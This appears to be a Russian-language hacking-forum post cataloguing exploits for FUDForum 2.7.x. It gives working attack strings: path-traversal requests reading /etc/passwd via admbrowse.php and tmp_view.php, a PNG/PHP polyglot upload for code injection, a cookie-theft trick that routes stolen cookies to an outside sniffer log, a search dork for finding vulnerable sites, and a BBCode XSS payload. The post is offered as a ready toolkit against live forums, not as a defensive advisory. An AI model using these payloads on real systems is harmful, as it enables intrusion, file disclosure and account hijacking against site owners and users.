![]() |
[Обзор Уязвимости FUDForum]
[Обзор] Уязвимости FUDForum Офф. Сайт www.fudforum.org Актуальная версия 2.7.7 Исходники Скачать Уязвимость в admbrowse.php Уязвимость в admbrowse.php позволяет просматривать произвольные файлы Код:
admbrowse.phpdown=1&cur=%2Fetc%2F&dest=passwd&rid=1&S=[someid]FUD Forum 2.7.1 PHP code injection vurnelability Возможность залить вместо аватара PHP скрипт, для этого соедините аватар с PHP файлом. Под linux/unix Код:
cat foo.png foo.php > upload_me.phpУязвимость в tmp_view.php Уязвимость позволяет просматривать произвольные файлы. Код:
/tmp_view.php?file=/etc/passwdКража cookie Берём картинку, с названием 1.jpg Открываем блокнотом. И вставляем в картинку допустим: Код:
<html> После вставки в сообщение будет ссылка наподобии этой: Код:
http://forum.site.ru/index.php?t=getfile&id=2723&private=0Код:
http://forum.site.ru/index.php?t=getfile&id=2723****** Далее идем сюда: Код:
http://old.antichat.ru/sniff/log.phpДля поиска: Код:
Powered by: FUDforum 2.7.4XSS На некоторых версиях при отключённых картинках, подписях и т.д. есть возможность провести XSS в отправке сообщения: Код:
[img=javascript:alert('bugs!');]Бага[/img](c) |
| Время: 00:25 |